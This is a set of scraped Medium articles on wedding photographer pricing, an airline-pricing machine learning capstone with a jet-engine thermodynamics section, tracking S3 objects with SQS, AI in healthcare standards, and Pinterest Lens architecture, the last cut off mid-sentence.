Title Much First Time Wedding Photographer CostContent Last Updated August 9th 2019 average price range would expect first time wedding photographer charge service 0 — 1000 photographer looking absolute first wedding experience may willing shoot free exchange “exposure” ability build wedding photography portfolio hand photographer deem time worth something monetary still want offer highly discounted service competitive established photographer marketplace hard fast rule opinion based personal experience pricing wedding photography service seeing starting rate charged photographer around web circle friend you’re hard number already want detail feel first time wedding photographer fall 0 — 1000 price range — we’re going cover detail Photography Intern v Photography Professional matter job person choosing work level learning curve best wedding photographer normally opportunity assist shadow second shoot already established wedding photographer get taste work without fully invest responsibility job often think starting photographer “interns” wedding industry much way person would intern teacher counselor etc idea “unpaid intern” seems getting le common least United States still remains one potential route idea intern receiving compensation form experience — may sufficient compensation simple fact — many photographer frankly — creatives working virtually industry object idea “working exposure” least understand logic behind working “exposure” actually result Okay — make sense working exposure don’t really agree principal especially true field wedding photography — high pressure high stress time outsider looking may seem easy enough — person taking picture people getting married practice though there’s lot need communication designing effective logistics wedding day thing outside “photography” earliest shoot free exposure incentive growing portfolio beneficial exposure never really translated anything tangible rarely would receive referral new business shoot benefited hand experience maybe enough extent benefit Every wedding photographer new experienced make decision time worth starting working free get little bit experience may okay that’s fine decision go route u — time valuable free never option anymore save maybe shooting photo charity like Lay Sleep wedding photographers’ job 8 hour single wedding day practice every booking result least 40–80 hour work — engagement shoot wedding day shooting photo editing email communication person meeting assembling timeline etc Whether photographer trying figure pricing prospective client looking figure much expecting pay — challenge keep mind wedding photographer looking maybe comparing way people probably put ton job realize paid accordingly — get dictate value value free first client — fine let it’s 500 — rad let decide take giant leap maybe already lot photography experience niche mean jump higher price point make mistake exposure doesn’t compensation Rarely promise exposure pay Money Real Compensation defining feature professional wedding photographer charge money amount service started charge shoot wedding session began approach thing business instead someone dabbling virtually new hobby money made invested new camera gear professional service make workflow better give client better experience time — allow u thing money personal level like travel think it’s entirely reasonable person starting industry get foot wet little financial incentive sustainable way living effort value — even ultimately artistic pursuit you’re newbie wedding photographer consider charging even 50 first wedding don’t photography portfolio established least make people value time effort you’re potential client looking wedding photographer cheap willing spend least little bit money someone present documenting one important day life photographer charging considering dropping tip end night way saying thanks time 3 Benefits Hiring First Time Wedding Photographer 1 Lower cost client budget people looking hire wedding photographer without lot extra spending money photographer starting going good match won’t level experience portfolio support still great work capture day got married back 2016 tight budget wedding wedding photography important u — time affording 5000 photographer wasn’t card struggled even keep rented house heated — even love respect work people saw ended finding great photographer starting rocking time love photo still stay connected we’ve opportunity see grow wedding photo business Related 2 Creating opportunity photographer photography industry filled lot people available take work Often hardest part getting first gig two client giving someone chance make dream come true huge deal Obviously want sure click person seem like come within reason wanting — great side effect 3 bring unrestricted point view wedding It’s easy wedding photographer done dozen hundred wedding get simple mindset thing Don’t get u wrong — definitely value sort approach situation easy turn cynicism bad case “honing in” get shot done Beginner photographer often lot unhinged They’re excited take great photo really great time since won’t feel like work yet Photographing one wedding lot different photographing 60th — tell 3 Downsides Hiring First Time Wedding Photographer 1 lack experience wedding day it’s really easy tell good wedding photographer bad one we’ve pointed beginner photographer bad — say lack experience sometimes necessary navigate wedding day successfully might thinking — wedding aren’t hard Sure — others throw curveballs schedule thrown family friend BG stirring drama photographer lot wedding experience able better adapt get shot needed — able predict type thing well 2 lack organization look back earliest wedding realize — “wow pretty disorganized” struggled figuring flow day communicating effectively client even finding way around wedding venue Since approach become much refined well professional start get organized many client even book u get info need upfront send wedding questionnaire month advance put together timeline help client get page u flow day Little thing like go long way creating organization proactively 3 won’t best gear back honest truth budget photographer photographing budget gear mentioned post shot first wedding Canon Rebel camera — good beginner camera really one task making professional image consistent fashion obvious reason professional camera gear cost money wedding photographer isn’t paid enough afford type equipment take really great photo actual cost often feel intangible tell we’ve spent 30000 camera gear help u support creation high quality beautiful image environment Budget gear work condition right enter low light imperfect lighting environment becomes harder harder get good image anything true wedding photography it’s consistency one goal you’re aspiring wedding photographer need help getting right camera lens etc — check Recommended Gear page right Thoughts — think price range 0 — 1000 reasonable mind first time wedding photographer We’d like hear thought let run good discussion topic know many people opinion including established photographer prospective client trying figure normal rate paying first time photographer Let u know camp fall tooTags Freelancing Business Photography Startup Entrepreneurship
3,836
Combining Data Science and Machine Learning with the Aviation Industry: A Personal Journey through a Capstone Project (Part II)
As a result of these initial scores, Figure 7 and Figure 8 above have been created to analyze the residuals within our model for training and testing. Each figure tells us that our model was appropriately chosen as the residuals do not show any clear patterns and also decently reveal an even spread of points above and below the horizontal red line. The horizontal red line represents the idealized regression of our model while the scattered points represent the difference in value of each consecutive prediction and label. Discovering a pattern in the residuals with our own eyes would indicate that we can use a better model to describe the system — logically, if you recognize a pattern in your errors, then that means you should recognize that there is a way to reduce that error by incorporating such pattern into your model. If all the residuals in both graphs showed uneven spread — where a significant amount of points exist in one threshold separated by the horizontal line over the other, or where residual show a pattern of slowly spreading out further and further from the horizontal line — it means your model could still be tweaked to account for evening out the residuals. Conclusions, Study Summary, and Thanks… It’s safe to start with stating that the study showed signs of a moderate success. From a variety of constraints — such as limited air travel in the new regime change, problems integrating API data together, unbalanced data, time constraints, data access restraints, and more — we were able to come out with a “proof-of-concept” study to show how a machine learning model can be used to predict the minimum cost threshold of airline tickets in this new regime. On the contrary, it is still appropriate to mention that the limitations of our model can make this attempt pointless in a business perspective due to how niche the study had become, where some corners had to be cut, and how practical/reliable the models will be. However, almost all models will face general limitations due to niche barriers, which leaves us hopeful to say that our model is just like any other models used to predict the same label (it can only get better). Through this study, a lot was covered, and it may be difficult now to fully gather together what was taken from both of the articles written here. To summarize, we as data scientists were approached by a business to answer the question, “What is the minimum cost threshold an airliner can charge their passengers per flight and how can we make a model that discovers this?” We were given a month time to have a working proof of concept. We achieved these goals, to some degree. Through the process, we learned about regime change and how the Covid-19 pandemic has played an instrumental role in our data collection phase. We learned about the limitations of using different APIs and what sort of cleaning must be done for data. We discussed how we can overcome data domain issues and create data out of our collection methods by using unique ways to increase data and add diversity to it. We learned about bootstrapping to expand our data and machine learning methods such as Linear regression, cross validation, KNN regression, and Decision Tree regression. We learned about ensemble machine learning such as Bagging regression and Random Forest and simultaneously discussed the data imbalance occurring from the trends we uncovered. We ultimately created a model with cross validated mean absolute error of $173 — all done without heavy hyperparameter tuning. To me, this capstone project served as a very personal journey to prove myself in the world of data. I wanted to use what I knew about the aerospace industry and combine it with data analytics to ultimately showcase a project worth investing more time and resources into. With a more stable regime, more access to data, and more time, this project has the capability to scale to help a real-world business. Writing this series has been a joy as I wanted to really express what I know to the world and also help someone learn from the study. Machine learning is a popular field to talk about, but it is often hard to find real-world practical implementations models. Many times, machine learning is left back with research as its uses for studies become too personalized around a specific problem. Ultimately I want the people, who took their precious time from their day to read this article, to come out of this series learning something new and thinking on ways to better analyze data and to apply machine learning to societal problems. I greatly appreciate your time and give my sincerest thanks. Do not stop teaching yourself and do push on to bigger and better things while you still can in this world; cherish what you learn as you go on. Cheers! BONUS: Learning How Thermodynamics can be Used to Predict Pricing My background is in engineering and I did as best as I could to reflect that here, but I know there is more which could have been done to better integrate engineering concepts into the study. In truth, this capstone project was initially inspired by a project I had done in my undergraduate studies with Hofstra University. One of my final design projects was meant for my Thermal Engineering course, which is the field that studies thermodynamic principles on machines. In this senior design project, I analyzed a trans-Atlantic flight I flew on earlier that year and collected data regarding that flight’s speed and altitude from FlightAware.com. At the time, it was much easier to get this data ported into an Excel spreadsheet, without the need for scraping — and this was before I knew how to use Python, how to web scrape, or how to play with APIs. From this data alone, along with some idealized assumptions, I was able to successfully perform a comprehensive idealized jet propulsion engine analysis on the plane’s engines and determine many important properties of the air traveling through the turbofans. I wanted to include this section as a bonus for one to ponder on when thinking about this study, as it is the “lost link” still wished to be integrated into the project, but could not have been implemented due to the FlightXML API constraints in the study and the lack of flight data due to Covid-19. Instead, I will give a walkthrough description of the project performed back in my undergraduate course in 2018, as an example to show what extra data could have been generated to potentially help better our model. On October 17th, 2018 I flew on flight BA115 (British Airways flight 115) to travel from London Heathrow Airport to JFK International Airport. The goal of such previous project was to perform and analysis on the thermodynamic cycle states of the engines. FlightAware.com was used primarily to access accurate speed and altitude measurements of the individual flight, as the plane logged such information over time to nearby radio checkpoints along the route. From FlightAware.com, it was also discovered that the plane flown was a B747–400, which is a quad-jet aircraft and is a variant of the B747 series — notoriously considered the most notable aircraft design in all of history of human flight. Above are two images of the October 17th flight flown in 2018. Unfortunately, it is not possible to access the graphic above from FlightAware.com anymore as basic access users only have access to 3 months of data history. As a result, take the referenced source for the above graphics with appropriate consideration that it may not be reflecting the same exact path described in the study, but is similar enough for our intended purposes. From FlightAware.com, I was able to retrieve 660 data points of speed, altitude, direction, time, and more of flight BA115. From this data, it was determined that the flight time lasted eight hours and fifteen minutes (29,700 seconds equivalent) and the total distance flown was 5,922.386 kilometers. The weather of that particular day showed clear skies throughout the entirety of the flight, eliminating the need for massive environmental constraints. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) In analyzing thermodynamic machines, graphics such as the one above are used to understand the different property states occurring through the machine’s life cycle. The one above showcases the relationship between entropy and temperature within the jet engine’s idealized lifecycle. Entropy (commonly defined as the variable “S” in theoretical thermodynamics…unlike our graphic denoting a lowercase “s” for “specific entropy” on the horizontal axis) is a measure of “how much energy is not available to do work in a system”. It is often closely associated with chaos or a measure of how a system becomes more disordered over time. The units of entropy are measured in Joules/Kelvin. Engineers, must understand what entropy is, but will more often use specific entropy in their analysis where its units are measured as kiloJoules/(kilograms*Kelvin) or more easily defined as entropy per mass. Specific entropy is often used to analyze a certain form of mass existing within a system, hence the inclusion kilogram units in the denominator. Specific entropy can change dependent on different states within a system — often for water, empirical steam tables are referenced to analyze the specific entropy of water to provide a better understanding of a system. For our case, we will be analyzing air, where such tables are not readily needed. Reverting back to our diagram above, the T-s diagram (Temperature vs entropy diagram) indicates how energy of air within the plane’s engine is analyzed during its lifecycle with pressure held constant across some processes. In entropy states one through three, pressure is increased through isentropic compression. Here, air travels first from the engine’s inlet, through the diffuser and then through the compressor. In process three to four, the air then travels through a burner/combustion chamber from the compressor. The air itself is heated up at constant pressure, resulting in higher entropic value, which simultaneously increases the heat transfer per unit mass (denoted as the variable “q”). The air currently is prone to a higher energy release. In process four through six, the air undergoes isentropic expansion where pressure is released in the journey from the combustion chamber, through the turbine, and through the nozzle exit. Such pressure release ultimately thrusts the aircraft forward with immense force, constantly. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) Throughout the study, several different assumptions and underlying initial conditions need to be addressed for its analysis. First, it was important to treat air as an ideal gas, meaning that air properties will behave normal to standard temperatures and pressures. From Appendix A.1 in the fourth edition of Engineering Thermodynamics by M. David Burghardt and by James A. Harbach, the specific heat of air constant pressure used in the study was 1.005 kiloJoules/(kilograms*Kelvin) and the Boltzmann constant used was 1.4. Both of such numbers will be important for our mathematical formulas used in learning about engine properties. Specific heat is a measure of how much energy must be added to a property to raise its temperature. Specific heat can change depending on surrounding factors, which is why it is important to denote what is held constant in such factors when relying on the ideal gas law (which is why we assumed air to be idealistic in our analysis). Specific heat can be affected by changing volumetric and pressure values which is why we only analyze such measures for ideal purposes by holding one of the independent variables constant. In our case, our engine will undergo a constant pressure process, which is why we will use the specific heat number for constant pressure for air as is the deterministic nature of the study. The Boltzmann constant is a number measuring the proportion of a property’s energy to thermodynamic temperature. The operating conditions of the engine were assumed to be steady state, which means that system state variables were to remain constant. Self-made whiteboard image. The plane was theoretically assumed to be a stationary object where recorded speed of the aircraft was factored as the air free-stream velocity (denoted as “v­­” subscript “∞”) to equal/represent the velocity of the aircraft (denoted as “v” subscript “aircraft”). Such assumptions allows us to state that the free-stream velocity can act as each jet engine intake. Furthermore, the kinetic and potential energy in the system were negligible except at the inlet and exit conditions, plus the atmospheric temperature, pressure, and air density were to be averaged values between zero and 15,000 meters altitude. From the UK Civil Aviation Authority Engine Type Certification Data Sheet №1048, it was uncovered that four Rolls Royce RB211–524H jet engines are typically used on a B747–400. For this study, only one engine will be analyzed and such findings from the individual engine analysis will be assumed across all four jets mounted on the airplane. A uniform diameter is assumed for the jet shaft with a length of 2.19 meters. The turbine work was assumed to be equal to the compressor work. The velocity of the air leaving the diffuser was assumed to be equal to zero meters per second. The thrust generated from bypassing air was to be neglected. The combustion chamber temperature was assumed to be 2,273 degrees Kelvin. The compression ratio, the ratio of total volume to clearance volume in a piston, was found to be 32.9:1. Generalized Analysis: Where Thermodynamics could have Merged with Machine Learning With all such assumptions and initial conditions factored in, the below follows the mathematical analysis performed to analyze the ideal jet propulsion cycle. All of such analysis is stemming off the concepts learned from my undergraduate studies and following the teachings of Dr. Burghardt himself, who wrote the heavily used textbook mentioned earlier as Engineering Thermodynamics. Through such analysis, we will primarily observe engine states by remarking a measure known as enthalpy, or enthalpy per unit mass for our system. Enthalpy is a measure of energy transfer between a system and its surroundings. Throughout our analysis, understanding this enthalpy will help us uncover all of the property states needed to tell us more about what is going on with our engine. This is where the magic occurs, in my opinion. In a rather elegant way, we scientists have the ability to know what is going on at every stage of our engine by simply measuring how much energy is moving within the engine — and we don’t even have to physically be on the airplane to do this. It was my intention to use such analysis to perform very comprehensive EDA for our initial machine learning study and include an analysis for the different engines present for different planes found out in our study — ultimately building a highly accurate tool able to give a better cost estimate of the journey analyzed. From such known data, we could find a way to factor important features such as measured average air temperature/pressure states, measured engine efficiency, measured thrust output, and measured propulsive thrust power. Expanding further on this could allow us to analyze air-fuel ratios, changing fuel mass over time on a flight, and maybe help us know how passenger payload can play a role in savings. To start before observing some MATLAB generated plots on these dependent variables, we will first go over the generalized analysis taken. Self-created LaTeX.
https://medium.com/analytics-vidhya/combining-data-science-and-machine-learning-with-the-aviation-industry-a-personal-journey-through-f063895fbd47
['Christopher Kuzemka']
2020-11-05 17:53:54.124000+00:00
['Data', 'Machine Learning', 'Aviation', 'Engineering', 'Python']
Title Combining Data Science Machine Learning Aviation Industry Personal Journey Capstone Project Part IIContent result initial score Figure 7 Figure 8 created analyze residual within model training testing figure tell u model appropriately chosen residual show clear pattern also decently reveal even spread point horizontal red line horizontal red line represents idealized regression model scattered point represent difference value consecutive prediction label Discovering pattern residual eye would indicate use better model describe system — logically recognize pattern error mean recognize way reduce error incorporating pattern model residual graph showed uneven spread — significant amount point exist one threshold separated horizontal line residual show pattern slowly spreading horizontal line — mean model could still tweaked account evening residual Conclusions Study Summary Thanks… It’s safe start stating study showed sign moderate success variety constraint — limited air travel new regime change problem integrating API data together unbalanced data time constraint data access restraint — able come “proofofconcept” study show machine learning model used predict minimum cost threshold airline ticket new regime contrary still appropriate mention limitation model make attempt pointless business perspective due niche study become corner cut practicalreliable model However almost model face general limitation due niche barrier leaf u hopeful say model like model used predict label get better study lot covered may difficult fully gather together taken article written summarize data scientist approached business answer question “What minimum cost threshold airliner charge passenger per flight make model discovers this” given month time working proof concept achieved goal degree process learned regime change Covid19 pandemic played instrumental role data collection phase learned limitation using different APIs sort cleaning must done data discussed overcome data domain issue create data collection method using unique way increase data add diversity learned bootstrapping expand data machine learning method Linear regression cross validation KNN regression Decision Tree regression learned ensemble machine learning Bagging regression Random Forest simultaneously discussed data imbalance occurring trend uncovered ultimately created model cross validated mean absolute error 173 — done without heavy hyperparameter tuning capstone project served personal journey prove world data wanted use knew aerospace industry combine data analytics ultimately showcase project worth investing time resource stable regime access data time project capability scale help realworld business Writing series joy wanted really express know world also help someone learn study Machine learning popular field talk often hard find realworld practical implementation model Many time machine learning left back research us study become personalized around specific problem Ultimately want people took precious time day read article come series learning something new thinking way better analyze data apply machine learning societal problem greatly appreciate time give sincerest thanks stop teaching push bigger better thing still world cherish learn go Cheers BONUS Learning Thermodynamics Used Predict Pricing background engineering best could reflect know could done better integrate engineering concept study truth capstone project initially inspired project done undergraduate study Hofstra University One final design project meant Thermal Engineering course field study thermodynamic principle machine senior design project analyzed transAtlantic flight flew earlier year collected data regarding flight’s speed altitude FlightAwarecom time much easier get data ported Excel spreadsheet without need scraping — knew use Python web scrape play APIs data alone along idealized assumption able successfully perform comprehensive idealized jet propulsion engine analysis plane’s engine determine many important property air traveling turbofan wanted include section bonus one ponder thinking study “lost link” still wished integrated project could implemented due FlightXML API constraint study lack flight data due Covid19 Instead give walkthrough description project performed back undergraduate course 2018 example show extra data could generated potentially help better model October 17th 2018 flew flight BA115 British Airways flight 115 travel London Heathrow Airport JFK International Airport goal previous project perform analysis thermodynamic cycle state engine FlightAwarecom used primarily access accurate speed altitude measurement individual flight plane logged information time nearby radio checkpoint along route FlightAwarecom also discovered plane flown B747–400 quadjet aircraft variant B747 series — notoriously considered notable aircraft design history human flight two image October 17th flight flown 2018 Unfortunately possible access graphic FlightAwarecom anymore basic access user access 3 month data history result take referenced source graphic appropriate consideration may reflecting exact path described study similar enough intended purpose FlightAwarecom able retrieve 660 data point speed altitude direction time flight BA115 data determined flight time lasted eight hour fifteen minute 29700 second equivalent total distance flown 5922386 kilometer weather particular day showed clear sky throughout entirety flight eliminating need massive environmental constraint Ideal Jet Propulsion Cycle referenced Cengal YA Boles 2002 Thermodynamics Engineering Approach McGrawHill Companies Inc New York NY 483–487 analyzing thermodynamic machine graphic one used understand different property state occurring machine’s life cycle one showcase relationship entropy temperature within jet engine’s idealized lifecycle Entropy commonly defined variable “S” theoretical thermodynamics…unlike graphic denoting lowercase “s” “specific entropy” horizontal axis measure “how much energy available work system” often closely associated chaos measure system becomes disordered time unit entropy measured JoulesKelvin Engineers must understand entropy often use specific entropy analysis unit measured kiloJouleskilogramsKelvin easily defined entropy per mass Specific entropy often used analyze certain form mass existing within system hence inclusion kilogram unit denominator Specific entropy change dependent different state within system — often water empirical steam table referenced analyze specific entropy water provide better understanding system case analyzing air table readily needed Reverting back diagram Ts diagram Temperature v entropy diagram indicates energy air within plane’s engine analyzed lifecycle pressure held constant across process entropy state one three pressure increased isentropic compression air travel first engine’s inlet diffuser compressor process three four air travel burnercombustion chamber compressor air heated constant pressure resulting higher entropic value simultaneously increase heat transfer per unit mass denoted variable “q” air currently prone higher energy release process four six air undergoes isentropic expansion pressure released journey combustion chamber turbine nozzle exit pressure release ultimately thrust aircraft forward immense force constantly Ideal Jet Propulsion Cycle referenced Cengal YA Boles 2002 Thermodynamics Engineering Approach McGrawHill Companies Inc New York NY 483–487 Throughout study several different assumption underlying initial condition need addressed analysis First important treat air ideal gas meaning air property behave normal standard temperature pressure Appendix A1 fourth edition Engineering Thermodynamics David Burghardt James Harbach specific heat air constant pressure used study 1005 kiloJouleskilogramsKelvin Boltzmann constant used 14 number important mathematical formula used learning engine property Specific heat measure much energy must added property raise temperature Specific heat change depending surrounding factor important denote held constant factor relying ideal gas law assumed air idealistic analysis Specific heat affected changing volumetric pressure value analyze measure ideal purpose holding one independent variable constant case engine undergo constant pressure process use specific heat number constant pressure air deterministic nature study Boltzmann constant number measuring proportion property’s energy thermodynamic temperature operating condition engine assumed steady state mean system state variable remain constant Selfmade whiteboard image plane theoretically assumed stationary object recorded speed aircraft factored air freestream velocity denoted “v­­” subscript “∞” equalrepresent velocity aircraft denoted “v” subscript “aircraft” assumption allows u state freestream velocity act jet engine intake Furthermore kinetic potential energy system negligible except inlet exit condition plus atmospheric temperature pressure air density averaged value zero 15000 meter altitude UK Civil Aviation Authority Engine Type Certification Data Sheet №1048 uncovered four Rolls Royce RB211–524H jet engine typically used B747–400 study one engine analyzed finding individual engine analysis assumed across four jet mounted airplane uniform diameter assumed jet shaft length 219 meter turbine work assumed equal compressor work velocity air leaving diffuser assumed equal zero meter per second thrust generated bypassing air neglected combustion chamber temperature assumed 2273 degree Kelvin compression ratio ratio total volume clearance volume piston found 3291 Generalized Analysis Thermodynamics could Merged Machine Learning assumption initial condition factored follows mathematical analysis performed analyze ideal jet propulsion cycle analysis stemming concept learned undergraduate study following teaching Dr Burghardt wrote heavily used textbook mentioned earlier Engineering Thermodynamics analysis primarily observe engine state remarking measure known enthalpy enthalpy per unit mass system Enthalpy measure energy transfer system surroundings Throughout analysis understanding enthalpy help u uncover property state needed tell u going engine magic occurs opinion rather elegant way scientist ability know going every stage engine simply measuring much energy moving within engine — don’t even physically airplane intention use analysis perform comprehensive EDA initial machine learning study include analysis different engine present different plane found study — ultimately building highly accurate tool able give better cost estimate journey analyzed known data could find way factor important feature measured average air temperaturepressure state measured engine efficiency measured thrust output measured propulsive thrust power Expanding could allow u analyze airfuel ratio changing fuel mass time flight maybe help u know passenger payload play role saving start observing MATLAB generated plot dependent variable first go generalized analysis taken Selfcreated LaTeXTags Data Machine Learning Aviation Engineering Python
3,837
How to Track Unprocessed Objects in S3
Solution with SQS Introduce an SQS queue to the setup. I’ll call this queue raw-data-object-creation-event-queue . A message event will be sent to this queue whenever a new object is created in the raw-data bucket. To accomplish this, set up an event listener at raw-data bucket and listen for All object create events happening. In case an object is created (ie. uploaded at this bucket), send a notification event at the SQS queue created.
https://towardsdatascience.com/how-to-track-unprocessed-objects-in-s3-5a7d3b32352d
['Dardan Xhymshiti']
2020-07-07 23:43:33.532000+00:00
['AWS', 'Programming', 'Data Sceince', 'Data Engineering']
Title Track Unprocessed Objects S3Content Solution SQS Introduce SQS queue setup I’ll call queue rawdataobjectcreationeventqueue message event sent queue whenever new object created rawdata bucket accomplish set event listener rawdata bucket listen object create event happening case object created ie uploaded bucket send notification event SQS queue createdTags AWS Programming Data Sceince Data Engineering
3,838
AI in healthcare: keeping data safe and building trust
Our approach to healthcare is changing rapidly, thanks to the Internet of Things (IoT), which continues to drive the demand for services offering more intelligent analytics. As machine learning advances, there is also a broadening applicability of AI. In an increasingly digitized world of connected devices and intelligent systems, international standards play a key role in addressing the ethical, technical, safety and security aspects of the technologies we encounter in daily life. Work is already underway in a joint committee for AI established by IEC and ISO. This is the first of its kind to consider the entire AI ecosystem rather than focusing on individual technical aspects. Headed by Wael Diab, a senior director at Huawei, it draws on the breadth of application areas covered in IEC and ISO, with IT and domain experts coming from different sectors. “Connected products and services such as medical devices and automated healthcare systems must be safe and secure or no one will want to use them. Trustworthiness and related areas such as resiliency, reliability, accuracy, explainability, safety, security and privacy must be considered from a systems perspective from the get-go. Standardization will need to adopt a broad approach to cover the AI technologies and consider synergies with analytics, big data, IoT and more”, says Diab. An apple a day keeps the algorithm away From robotically-assisted surgery, virtual nursing assistants, dosage error reduction and connected devices to image analysis and clinical trials, AI technologies already play many different roles in the delivery of healthcare treatments, surgeries and services. They include improving diagnostics and helping doctors make better decisions for patients. Health insurance is a critical part of the industry and is also making use of AI. For example, some software platforms use machine learning to identify and reduce inefficiencies in the claims management process such as fraudulent inaccurate billing or waste through under-utilization of services. Others help patients choose tailored insurance coverage to reduce healthcare costs and assist employers looking for group coverage options. Digitizing healthcare The personal data of millions of patients worldwide is being gathered, stored and shared electronically in healthcare management delivery systems, clinical research and medical consultations. Doctors and researchers alone can’t leverage all this information to enhance patient care, but in a growing number of trials, algorithms have successfully mined huge numbers of patient files and medical images in a timely manner, with the result that diverse conditions are detected and diagnosed. Examples include certain cancers, the risk of heart disease and eye-related conditions. AI-powered imaging technology has learned to read thousands of anonymized complex eye scans and detected more than 50 eye conditions successfully. With an accuracy level of 94%, the algorithms matched or beat the performance of world-leading eye specialists. The argument is that this technique of sifting through big data rapidly could help reduce the time taken for patients to be seen by a consultant, and possibly save a person’s sight, but there are many hurdles to overcome before trials are fully approved. How safe is AI in the medical context? What happens if we are not in the 94% accuracy group? What if the algorithm developers get it wrong and create biases which impact patients negatively? While it has been acknowledged that technology has the potential for improving patient care greatly, thereby saving costs, some physicians and scientists are warning the AI community to get their ethics right first. In the healthcare context, errors could potentially harm or be fatal. If this doesn’t happen, we run the risk of introducing automated systems into the mix in a blind fashion. If errors occur, who will be accountable: machines or healthcare professionals? Recent research by Stanford University, published in the New England Journal of Medicine, raises a number of key issues which need to be addressed thoroughly before rolling out AI into healthcare. They include: Ensuring that data bias in algorithms doesn’t skew results Making sure physicians have an adequate understanding of how algorithms are developed and don’t over-rely on them Maintaining regard for clinical experience, so that the human aspect of patient care is not lost Maintaining confidentiality as the dynamics of doctor-patient relationships change Find out more by reading the article Eliminating bias from algorithms in this issue. Looking ahead Disruptive technologies like artificial intelligence pose both challenges and opportunities across all sectors. AI has already changed many aspects of daily life and will continue to have a massive impact on the lives of people and on entire societies. The important task of ironing out the many ethical questions already raised is vital to the successful adoption of these innovative technologies. IEC also contributes towards this effort as a founding member of the Open Community for Ethics in Autonomous and Intelligent Systems (OCEANIS). This community provides a space for interested organizations from around the world to share information and collaborate on initiatives and programmes, while enhancing the understanding of the role of standards in facilitating innovation. “Consensus-based international standards will play a crucial role in accelerating adoption of AI technology in industry application verticals,” says Diab. “End user societal concerns, ethical and trustworthiness considerations are being discussed and incorporated from the ground up.”
https://medium.com/e-tech/how-safe-is-ai-in-healthcare-81bd678e6f8f
[]
2019-02-06 09:29:54.296000+00:00
['Health Data', 'Health', 'Artificial Intelligence', 'Healthcare', 'Ethics']
Title AI healthcare keeping data safe building trustContent approach healthcare changing rapidly thanks Internet Things IoT continues drive demand service offering intelligent analytics machine learning advance also broadening applicability AI increasingly digitized world connected device intelligent system international standard play key role addressing ethical technical safety security aspect technology encounter daily life Work already underway joint committee AI established IEC ISO first kind consider entire AI ecosystem rather focusing individual technical aspect Headed Wael Diab senior director Huawei draw breadth application area covered IEC ISO domain expert coming different sector “Connected product service medical device automated healthcare system must safe secure one want use Trustworthiness related area resiliency reliability accuracy explainability safety security privacy must considered system perspective getgo Standardization need adopt broad approach cover AI technology consider synergy analytics big data IoT more” say Diab apple day keep algorithm away roboticallyassisted surgery virtual nursing assistant dosage error reduction connected device image analysis clinical trial AI technology already play many different role delivery healthcare treatment surgery service include improving diagnostics helping doctor make better decision patient Health insurance critical part industry also making use AI example software platform use machine learning identify reduce inefficiency claim management process fraudulent inaccurate billing waste underutilization service Others help patient choose tailored insurance coverage reduce healthcare cost assist employer looking group coverage option Digitizing healthcare personal data million patient worldwide gathered stored shared electronically healthcare management delivery system clinical research medical consultation Doctors researcher alone can’t leverage information enhance patient care growing number trial algorithm successfully mined huge number patient file medical image timely manner result diverse condition detected diagnosed Examples include certain cancer risk heart disease eyerelated condition AIpowered imaging technology learned read thousand anonymized complex eye scan detected 50 eye condition successfully accuracy level 94 algorithm matched beat performance worldleading eye specialist argument technique sifting big data rapidly could help reduce time taken patient seen consultant possibly save person’s sight many hurdle overcome trial fully approved safe AI medical context happens 94 accuracy group algorithm developer get wrong create bias impact patient negatively acknowledged technology potential improving patient care greatly thereby saving cost physician scientist warning AI community get ethic right first healthcare context error could potentially harm fatal doesn’t happen run risk introducing automated system mix blind fashion error occur accountable machine healthcare professional Recent research Stanford University published New England Journal Medicine raise number key issue need addressed thoroughly rolling AI healthcare include Ensuring data bias algorithm doesn’t skew result Making sure physician adequate understanding algorithm developed don’t overrely Maintaining regard clinical experience human aspect patient care lost Maintaining confidentiality dynamic doctorpatient relationship change Find reading article Eliminating bias algorithm issue Looking ahead Disruptive technology like artificial intelligence pose challenge opportunity across sector AI already changed many aspect daily life continue massive impact life people entire society important task ironing many ethical question already raised vital successful adoption innovative technology IEC also contributes towards effort founding member Open Community Ethics Autonomous Intelligent Systems OCEANIS community provides space interested organization around world share information collaborate initiative programme enhancing understanding role standard facilitating innovation “Consensusbased international standard play crucial role accelerating adoption AI technology industry application verticals” say Diab “End user societal concern ethical trustworthiness consideration discussed incorporated ground up”Tags Health Data Health Artificial Intelligence Healthcare Ethics
3,839
Building Pinterest Lens: a real world visual discovery system
Andrew Zhai | Pinterest tech lead, Visual Search Recently, we announced Lens BETA, a new way to discover objects and ideas from the world around on you using your phone’s camera. Just tap the Lens icon in the Pinterest app, point it at anything and Lens will return visually similar objects, related ideas or the object in completed projects or contexts. Lens enables you to go beyond traditional uses of your phone’s camera–taking selfies or saving a scene–and turns it into a powerful discovery system. It brings the magic of Pinterest into the real world, so that anything you see can lead to a related idea on Pinterest. Here we’ll share how we built Lens and the main technical challenges we overcame. Background In 2015, we launched our first visual search experience which enables people to pinpoint parts of an image and get visually similar results. With visual search, we gained a platform to advance our technology and incrementally improve the system by optimizing for not only relevant results but engaging ones, too. Pinners have responded positively to these improvements and now generate more than 250 million unique visual searches every month. As the next evolution of visual search, we introduced real-time object detection. This not only made visual search easier to use, but we also steadily gained a corpus of objects as people saved and selected them. Since its launch, we’ve generated billions of objects in just six month’s time, and have used this data to build new technologies, such as Lens and object search. If you’re interested in a more in-depth look at how we scaled our visual search technology to billions of images and applied it across Pinterest, please take a look at our Visual Discovery at Pinterest paper that was accepted for publication at World Wide Web (WWW) conference this year. Lens architecture A single Pin can take you down a rabbit hole of related ideas, enabling you to discover high quality content from 150M people around the world. As we developed Lens, we wanted to parallel this experience, so a single real world camera image could connect you to the 100B ideas on Pinterest. Lens combines our understanding of images and objects with our discovery technologies to offer Pinners a diverse set of results. For example, if you take a picture of a blueberry, Lens doesn’t just return blueberries: it also gives you more results such as recipes for blueberry scones and smoothies, beauty ideas like detox scrubs or tips for growing your own blueberry bush. To do this, Lens’ overall architecture is separated into two logical components. The first component is our query understanding layer where we derive information regarding the given input image. Here we compute visual features such as detecting objects, computing salient colors and detecting lighting and image quality conditions. Using the visual features, we also compute semantic features such as annotations and category. The second component is our blender, as the results Lens returns come from multiple sources. We use our visual search technology to return visually similar results, object search technology to return scenes or projects with visually similar objects (more on this below) and image search which uses the derived annotations to return personalized text search results that are semantically (not visually) relevant to the input image. It’s the job of the blender to dynamically change blending ratios and result sources based on the information derived in the query understanding layer. For instance, image search won’t be triggered if our annotations are low confidence, and object search won’t be triggered if no relevant objects are detected. As shown above, Lens results aren’t strictly visually similar, they come 